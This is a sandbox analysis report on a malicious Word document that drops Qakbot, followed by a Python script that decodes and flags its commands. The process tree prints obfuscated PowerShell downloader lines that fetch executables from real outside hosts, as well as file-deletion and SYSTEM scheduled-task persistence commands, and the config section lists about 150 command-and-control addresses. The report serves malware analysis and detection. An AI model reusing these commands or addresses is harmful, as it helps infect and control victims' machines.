Analysis
-
max time kernel: 136s
max time network: 33s
platform: windows7_x64
resource: win7v200430
submitted: 09-06-2020 11:55
Static task: static1
Behavioral task: behavioral1
Sample: AGRMT_06052020_195.doc
Resource: win7v200430
General
-
Target: AGRMT_06052020_195.doc
Size: 220KB
MD5: bc8cf7a3c840dc88cfa89f69852e46e6
SHA1: 1528a5750c9072ebbc963687079c010b18240c9e
SHA256: e0dffa6bd2f4dd302690fc57b659149f59c394b4235edf33bf6a10ba0873dafc
SHA512: c2ed63d68e2f23917f448e8bda38058f7c6c02fce9b6fdd474983bed4e0e089759407d214f5eb307eb58101017a9918fae0307bdd10d1634ff26084eed7ea317
Malware Config
Extracted: http://salwadm.com/tcphx/8888888.png
Extracted: http://flipkenya.com/nujazbwrhjy/8888888.png
Extracted: qakbot
spx135
1591627649
C2 (IP:port):
89.32.216.156:443
74.222.204.82:443
24.183.39.93:443
97.93.211.17:443
80.14.209.42:2222
96.35.170.82:2222
151.73.124.242:443
98.110.231.63:443
108.227.161.27:995
173.3.132.17:995
31.5.41.52:443
24.122.228.88:443
5.107.208.94:2222
76.185.136.58:443
50.29.166.232:995
73.210.114.187:443
92.114.107.193:995
24.43.22.220:993
50.247.230.33:995
72.142.106.198:465
102.41.122.185:995
67.131.59.17:443
184.98.104.7:995
69.11.247.242:443
201.127.4.70:443
72.204.242.138:50003
189.231.198.212:443
5.14.44.173:2222
5.14.76.156:443
151.205.102.42:443
179.51.23.31:443
72.190.101.70:443
73.76.47.127:443
80.240.26.178:443
72.36.59.46:2222
73.209.113.58:443
68.49.120.179:443
69.92.54.95:995
187.19.151.218:995
50.244.112.10:443
66.222.88.126:995
207.255.161.8:32102
108.58.9.238:995
105.98.154.57:443
98.219.77.197:443
216.163.4.91:443
47.152.210.233:443
178.223.17.74:995
72.204.242.138:20
82.127.193.151:2222
50.91.171.137:443
172.242.80.243:443
189.163.110.244:443
108.30.125.94:443
104.50.141.139:995
73.94.229.115:443
67.83.54.76:2222
72.29.181.77:2078
188.24.102.178:443
66.68.22.151:443
24.122.157.93:443
72.204.242.138:53
172.87.134.226:443
118.160.164.140:443
173.49.122.160:995
71.187.170.235:443
134.0.196.46:995
75.81.25.223:443
92.17.167.87:2222
185.246.9.69:995
70.123.92.175:2222
82.37.242.8:443
108.51.73.186:443
137.99.222.152:443
100.38.164.182:443
75.137.239.211:443
24.43.22.220:995
24.99.180.247:443
96.56.237.174:993
72.204.242.138:80
79.114.196.97:443
72.204.242.138:443
72.240.245.253:443
24.202.42.48:2222
46.102.60.186:443
200.113.201.83:993
98.27.176.35:443
47.201.1.210:443
50.78.93.74:443
68.60.221.169:465
66.26.160.37:443
190.198.124.212:2078
65.131.83.170:995
50.244.112.106:443
72.204.242.138:32102
77.159.149.74:443
184.96.155.4:993
72.16.212.108:465
47.153.115.154:995
72.240.200.181:2222
24.46.40.189:2222
68.82.125.234:443
188.173.70.18:443
47.40.244.237:443
5.13.105.2:443
76.30.66.244:443
5.14.188.235:443
72.204.242.138:995
5.69.56.255:443
5.14.248.119:443
188.192.75.8:443
24.27.82.216:2222
98.118.156.172:443
189.236.218.181:443
72.204.242.138:2078
47.41.3.40:443
108.28.90.129:443
184.89.71.68:443
31.50.210.205:2222
95.76.27.89:443
207.255.161.8:443
149.71.50.158:443
98.222.23.221:443
96.56.237.174:32103
68.116.193.239:443
100.38.123.22:443
47.24.47.218:443
24.110.96.149:443
181.91.254.1:443
96.18.240.158:443
67.165.206.193:995
69.28.222.54:443
98.243.187.85:443
184.180.157.203:2222
47.136.224.60:443
73.90.4.146:443
207.255.161.8:2222
203.33.139.134:443
104.221.4.11:2222
72.228.3.116:443
72.209.191.27:443
97.127.136.28:0
108.45.29.12:443
2.89.100.34:443
64.19.74.29:995
208.82.44.203:443
199.247.16.80:443
199.247.22.145:443
89.43.108.19:443
71.182.142.63:443
Signatures
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
pid 1312 WINWORD.EXE
-
Process spawned unexpected child process 7 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Parent C:\Program Files\Microsoft Office\Office14\WINWORD.EXE (pid 1312) is not expected to spawn this process:
pid 1064 cmd.exe
pid 1496 cmd.exe
pid 1688 cmd.exe
pid 1844 cmd.exe
pid 368 cmd.exe
pid 1608 cmd.exe
pid 1956 cmd.exe
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
pid 1804 powershell.exe ×2
pid 928 powershell.exe ×2
pid 748 file2.exe ×1
pid 1532 file2.exe ×2
pid 1812 cwvvo.exe ×1
pid 1768 cwvvo.exe ×2
pid 1740 explorer.exe ×2
-
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
pid 1312 WINWORD.EXE ×2
-
Blacklisted process makes network request 2 IoCs
Processes:
flow 4, pid 1804 powershell.exe
flow 8, pid 928 powershell.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
pid 748 file2.exe
-
Modifies registry class 280 IoCs
Processes:
All paths below are under \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES unless they begin with \REGISTRY\MACHINE; every entry was written by WINWORD.EXE (64 of the 280 IoCs are listed).
- Set value (str) Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList"
- Key created Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}
- Key created Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}
- Set value (str) Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5"
- Set value (str) Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton"
- Key created Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}
- Set value (str) Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"
- Key created Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}
- Set value (str) Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString"
- Key created Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}
- Set value (str) Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"
- Set value (str) Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton"
- Set value (str) Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9"
- Set value (str) Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"
- Set value (str) Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4"
- Set value (str) Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6"
- Key created Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}
- Set value (str) Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"
- Set value (str) Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList"
- Key created Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}
- Key created Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}
- Key created Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}
- Key created TypeLib\{E47EA5A9-C05C-4335-90E1-A5618C3D290A}\2.0\HELPDIR
- Key created Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}
- Key created Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}
- Set value (str) Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"
- Key created Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}
- Set value (str) Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab"
- Key created Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}
- Set value (str) Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"
- Key created Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}
- Key created Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}
- Key created Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}
- Key created Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}
- Set value (str) Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect"
- Set value (str) Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents"
- Key created Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}
- Key created Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}
- Key created Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E47EA5A9-C05C-4335-90E1-A5618C3D290A}\2.0\FLAGS
- Key created Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}
- Key created Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}
- Set value (str) Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage"
- Set value (str) Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage"
- Key created Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E47EA5A9-C05C-4335-90E1-A5618C3D290A}\2.0
- Set value (str) Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar"
- Key created Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}
- Key created Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}
- Set value (str) Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10"
- Key created Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}
- Key created Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}
- Key created Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}
- Set value (str) Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs"
- Key created Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}
- Key created Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}
- Set value (str) Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"
- Set value (str) Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo"
- Set value (str) Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5"
- Key created Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}
- Set value (str) Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages"
- Key created Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}
- Set value (str) Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents"
- Set value (str) TypeLib\{E47EA5A9-C05C-4335-90E1-A5618C3D290A}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd"
-
Suspicious use of WriteProcessMemory 43 IoCs
Processes:
PID 1312 WINWORD.EXE wrote to memory of 1064 cmd.exe ×3
PID 1312 WINWORD.EXE wrote to memory of 1496 cmd.exe ×3
PID 1312 WINWORD.EXE wrote to memory of 1688 cmd.exe ×3
PID 1312 WINWORD.EXE wrote to memory of 1844 cmd.exe ×3
PID 1312 WINWORD.EXE wrote to memory of 368 cmd.exe ×3
PID 1312 WINWORD.EXE wrote to memory of 1608 cmd.exe ×3
PID 1312 WINWORD.EXE wrote to memory of 1956 cmd.exe ×3
PID 1956 cmd.exe wrote to memory of 748 file2.exe ×1
PID 748 file2.exe wrote to memory of 1532 file2.exe ×4
PID 748 file2.exe wrote to memory of 1812 cwvvo.exe ×4
PID 748 file2.exe wrote to memory of 1380 schtasks.exe ×4
PID 1812 cwvvo.exe wrote to memory of 1768 cwvvo.exe ×4
PID 1812 cwvvo.exe wrote to memory of 1740 explorer.exe ×5
-
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
pid 1812 cwvvo.exe
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Office loads VBA resources, possible macro or embedded object present
-
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
pid 1312 WINWORD.EXE ×3
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
Token: SeDebugPrivilege, pid 1804 powershell.exe
Token: SeDebugPrivilege, pid 928 powershell.exe
-
Executes dropped EXE 4 IoCs
Processes:
pid 748 file2.exe
pid 1532 file2.exe
pid 1812 cwvvo.exe
pid 1768 cwvvo.exe
-
Loads dropped DLL 2 IoCs
Processes:
pid 748 file2.exe ×2
Processes
-
Tree depth is given in brackets and by indentation; each entry shows the image path, then the command line, then the signatures it triggered.
[1] C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\AGRMT_06052020_195.doc"
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of FindShellTrayWindow
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    - Suspicious use of SetWindowsHookEx
  [2] C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c mkdir C:\Users\Public\tmpdir
      - Process spawned unexpected child process
  [2] C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /C choice /C Y /N /D Y /T 1 & Del C:\Users\Public\tmp.bat
      - Process spawned unexpected child process
    [3] C:\Windows\system32\choice.exe
        choice /C Y /N /D Y /T 1
  [2] C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL3NhbHdhZG0uY29tL3RjcGh4Lzg4ODg4ODgucG5n')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:\Users\Public\1.txt
      - Process spawned unexpected child process
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL3NhbHdhZG0uY29tL3RjcGh4Lzg4ODg4ODgucG5n')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e')
        - Suspicious behavior: EnumeratesProcesses
        - Blacklisted process makes network request
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps1.bat & del C:\Users\Public\1.txt
      - Process spawned unexpected child process
    [3] C:\Windows\system32\choice.exe
        choice /C Y /N /D Y /T 65
  [2] C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2ZsaXBrZW55YS5jb20vbnVqYXpid3JoankvODg4ODg4OC5wbmc=')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '2' + '.e' + 'x' + 'e') >C:\Users\Public\2.txt
      - Process spawned unexpected child process
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2ZsaXBrZW55YS5jb20vbnVqYXpid3JoankvODg4ODg4OC5wbmc=')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '2' + '.e' + 'x' + 'e')
        - Suspicious behavior: EnumeratesProcesses
        - Blacklisted process makes network request
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps2.bat & del C:\Users\Public\2.txt
      - Process spawned unexpected child process
    [3] C:\Windows\system32\choice.exe
        choice /C Y /N /D Y /T 65
  [2] C:\Windows\system32\cmd.exe
      cmd /c C:\Users\Public\tmpdir\tmps2.bat
      - Process spawned unexpected child process
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /C choice /C Y /N /D Y /T 2
      [4] C:\Windows\system32\choice.exe
          choice /C Y /N /D Y /T 2
    [3] C:\Users\Public\tmpdir\file2.exe
        C:\Users\Public\tmpdir\file2.exe
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: CmdExeWriteProcessMemorySpam
        - Suspicious use of WriteProcessMemory
        - Executes dropped EXE
        - Loads dropped DLL
      [4] C:\Users\Public\tmpdir\file2.exe
          C:\Users\Public\tmpdir\file2.exe /C
          - Suspicious behavior: EnumeratesProcesses
          - Executes dropped EXE
      [4] C:\Users\Admin\AppData\Roaming\Microsoft\Azpnylmfhe\cwvvo.exe
          C:\Users\Admin\AppData\Roaming\Microsoft\Azpnylmfhe\cwvvo.exe
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of WriteProcessMemory
          - Suspicious behavior: MapViewOfSection
          - Executes dropped EXE
        [5] C:\Users\Admin\AppData\Roaming\Microsoft\Azpnylmfhe\cwvvo.exe
            C:\Users\Admin\AppData\Roaming\Microsoft\Azpnylmfhe\cwvvo.exe /C
            - Suspicious behavior: EnumeratesProcesses
            - Executes dropped EXE
        [5] C:\Windows\SysWOW64\explorer.exe
            C:\Windows\SysWOW64\explorer.exe
            - Suspicious behavior: EnumeratesProcesses
      [4] C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn fcyfsnhihx /tr "\"C:\Users\Public\tmpdir\file2.exe\" /I fcyfsnhihx" /SC ONCE /Z /ST 14:09 /ET 14:21
          - Creates scheduled task(s)
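The process tree above contains the three patterns an analyst has to unpick by hand: a PowerShell downloader whose URL and drop path are split across FromBase64String() calls and '+'-joined literals, a `choice /D Y /T N & del ...` idiom that sleeps and then removes the batch staging files, and a `schtasks /Create /RU "NT AUTHORITY\SYSTEM"` line that re-launches the dropped file2.exe. As an added example (this is not the sandbox's code and not the malware's), the Python below decodes the DownloadFile arguments, extracts the sleep interval and the task parameters, and runs those checks plus an Office-parent-spawns-shell rule over a constructed list of (parent, image, command line) triples transcribed from the tree. The Office-host and shell sets are this example's own assumptions; PIDs are omitted.

```python
import base64
import re

# Constructed sample: (parent image, image, command line) triples transcribed from the
# process tree above; PIDs are left out and these strings are the only input used.
SAMPLE_CHAIN = [
    ("explorer.exe", "WINWORD.EXE",
     r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\AGRMT_06052020_195.doc"'),
    ("WINWORD.EXE", "cmd.exe", r"C:\Windows\System32\cmd.exe /c mkdir C:\Users\Public\tmpdir"),
    ("WINWORD.EXE", "cmd.exe",
     r"C:\Windows\System32\cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps1.bat & del C:\Users\Public\1.txt"),
    ("cmd.exe", "powershell.exe",
     "powershell -Command \"\"(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString("
     "[System.Convert]::FromBase64String('aHR0cDovL3NhbHdhZG0uY29tL3RjcGh4Lzg4ODg4ODgucG5n')), "
     "[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("
     "'QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e')"),
    ("file2.exe", "schtasks.exe",
     r'"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn fcyfsnhihx '
     r'/tr "\"C:\Users\Public\tmpdir\file2.exe\" /I fcyfsnhihx" /SC ONCE /Z /ST 14:09 /ET 14:21'),
]

FRAGMENT = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)|'([^']*)'")
CHOICE_T = re.compile(r"\bchoice\b[^&|]*?/T\s+(\d+)", re.I)
OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe"}           # assumption: parents to watch
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}  # assumption: children to flag


def eval_ps_string(expr):
    """Evaluate a PowerShell string expression built from FromBase64String('..') calls
    and '+'-joined single-quoted literals, keeping source order."""
    out = []
    for m in FRAGMENT.finditer(expr):
        out.append(base64.b64decode(m.group(1)).decode("ascii") if m.group(1) is not None else m.group(2))
    return "".join(out)


def decode_downloadfile(cmdline):
    """Return (url, destination) for a WebClient.DownloadFile(a, b) call, or None."""
    start = cmdline.find("DownloadFile(")
    if start < 0:
        return None
    args, cur, depth = [], "", 0
    for ch in cmdline[start + len("DownloadFile"):]:
        if ch == "(":
            depth += 1
            if depth == 1:            # the call's own opening paren
                continue
        elif ch == ")":
            depth -= 1
            if depth == 0:            # matching close paren ends the argument list
                break
        if ch == "," and depth == 1:  # a top-level comma separates the arguments
            args.append(cur)
            cur = ""
        else:
            cur += ch
    args.append(cur)
    return tuple(eval_ps_string(a) for a in args)


def choice_sleep_seconds(cmdline):
    """`choice /D <x> /T N` with nobody at the keyboard is a sleep of N seconds; return N or None."""
    m = CHOICE_T.search(cmdline)
    return int(m.group(1)) if m else None


def parse_schtasks_create(cmdline):
    """Pull the switches that matter out of a `schtasks /Create` command line."""
    if not re.search(r"/create\b", cmdline, re.I):
        return None

    def switch(name, value=r'"([^"]*)"|(\S+)'):
        m = re.search(r"/%s\s+(?:%s)" % (name, value), cmdline, re.I)
        return next(g for g in m.groups() if g is not None) if m else None

    run = switch("tr", r'"((?:[^"\\]|\\.)*)"')   # the quoted value may contain \" escapes
    return {"name": switch("tn"), "run_as": switch("ru"), "schedule": switch("sc"),
            "task_run": run.replace('\\"', '"') if run else None}


def triage(chain):
    """Run the checks above over a process chain and return the findings as tuples."""
    findings = []
    for parent, image, cmd in chain:
        parent_l, image_l = parent.lower(), image.lower()
        if parent_l in OFFICE_HOSTS and image_l in SHELLS:
            findings.append(("office_spawns_shell", parent, image))
        if image_l == "powershell.exe":
            dl = decode_downloadfile(cmd)
            if dl:
                findings.append(("powershell_download", dl[0], dl[1]))
        secs = choice_sleep_seconds(cmd)
        if secs is not None and re.search(r"\bdel\b", cmd, re.I):
            findings.append(("delayed_delete", secs))
        if image_l == "schtasks.exe":
            st = parse_schtasks_create(cmd)
            if st and (st["run_as"] or "").upper().endswith("SYSTEM"):
                findings.append(("schtasks_as_system", st["name"], st["schedule"], st["task_run"]))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_CHAIN):
        print(finding)
```

The decoder walks parentheses rather than splitting on commas so that the nested GetString(FromBase64String(...)) calls are kept with the argument they belong to; the same function recovers the second download (the flipkenya.com URL and file2.exe) from the other PowerShell line in the tree. Note that the chain never shows tmps1.bat being run: only tmps2.bat, and hence only file2.exe, executes.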
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
-
C:\Users\Admin\AppData\Roaming\Microsoft\Azpnylmfhe\cwvvo.dat
-
C:\Users\Admin\AppData\Roaming\Microsoft\Azpnylmfhe\cwvvo.exe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Azpnylmfhe\cwvvo.exe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Azpnylmfhe\cwvvo.exe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
-
C:\Users\Public\1.txt
-
C:\Users\Public\2.txt
-
C:\Users\Public\tmp.bat
-
C:\Users\Public\tmpdir\file2.exe
-
C:\Users\Public\tmpdir\file2.exe
-
C:\Users\Public\tmpdir\file2.exe
-
C:\Users\Public\tmpdir\tmps2.bat
-
\Users\Admin\AppData\Roaming\Microsoft\Azpnylmfhe\cwvvo.exe
-
\Users\Admin\AppData\Roaming\Microsoft\Azpnylmfhe\cwvvo.exe
-
memory/1312-2-0x00000000089D0000-0x00000000089D4000-memory.dmp (Filesize 16KB)
-
memory/1532-19-0x00000000022C0000-0x00000000022D1000-memory.dmp (Filesize 68KB)
-
memory/1768-25-0x0000000002370000-0x0000000002381000-memory.dmp (Filesize 68KB)
-
memory/1812-26-0x0000000000370000-0x00000000003AA000-memory.dmp (Filesize 232KB)